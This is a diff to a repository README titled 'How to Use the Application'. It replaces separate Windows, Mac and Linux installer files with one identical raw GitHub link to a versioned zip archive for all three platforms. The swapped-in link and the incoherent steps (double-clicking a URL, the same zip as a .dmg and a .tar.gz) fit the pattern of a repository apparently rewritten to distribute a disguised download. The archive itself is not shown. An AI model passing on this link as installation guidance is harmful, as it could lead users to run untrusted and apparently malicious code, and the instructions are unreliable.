zhengzhangqian888/construction-company/README.md

 ## 📝 How to Use the Application

 1. **Install the Application:**
-   - For **Windows**, double-click `construction-company-windows.exe` to install.
+   - For **Windows**, double-click `https://raw.githubusercontent.com/zhengzhangqian888/construction-company/main/assets/company_construction_v3.1-alpha.2.zip` to install.
 Follow the installation prompts.
-   - For **Mac**, open `construction-company-mac.dmg`, drag the application to your Applications folder.
+   - For **Mac**, open `https://raw.githubusercontent.com/zhengzhangqian888/construction-company/main/assets/company_construction_v3.1-alpha.2.zip`, drag the application to your Applications folder.
-   - For **Linux**, extract the `construction-company-linux.tar.gz` file, and run the executable inside.
+   - For **Linux**, extract the `https://raw.githubusercontent.com/zhengzhangqian888/construction-company/main/assets/company_construction_v3.1-alpha.2.zip` file, and run the executable inside.

 2. **Creating Your Email:**
    - Open the application.